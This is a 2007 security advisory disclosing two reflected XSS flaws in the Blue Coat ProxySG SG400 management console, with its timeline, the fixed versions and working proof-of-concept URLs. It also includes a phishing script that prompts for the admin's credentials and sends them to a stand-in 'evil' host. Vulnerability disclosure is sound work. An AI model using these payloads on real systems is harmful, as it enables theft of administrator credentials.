Two XSS on Blue Coat ProxySG Management Console
PR07-29: Two XSS on Blue Coat ProxySG Management Console
Vulnerability found: 23 July 2007
Vendor informed: 20 August 2007
Vulnerability fixed: 29 October 2007
Advisory publicly released: 1 November 2007
Severity: Medium
Description:
Blue Coat SG400 is vulnerable to a couple of XSS holes.
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_action/crl_format' / 'name'
Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_from_file.htm' / 'file'
Notes:
The admin user needs to be authenticated (HTTP basic authentication) for the
injected JavaScript to run.
Successfully tested on:
Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173
Proof of concept #1:
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00
Injected payload:
"<script>alert("XSS")</script>%00
Proof of concept #2:
https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--
Injected payload:
<script>alert("XSS")</script><!--
A neat payload to inject instead of a alert() box would be a phishing attack
which would forward the username and password to a third-party site (the code
could be inserted from a third-party site).
i.e.:
<script>
do {
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your
USERNAME","");
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your
PASSWORD","");
}while(a==null || b==null || a=="" || b=="");
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
</script><!--
Consequences:
An attacker may be able to cause execution of malicious scripting code in the
browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG
Management Console. Such code would run within the context of the target domain.
This type of attack can result in non-persistent defacement of the target site,
or the redirection of confidential information (i.e.: basic auth credentials
stolen through a phishing attack as described in the Proof of Concept) to
unauthorised third parties.
Fixed in:
4.2.6.1, 5.2.2.5
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)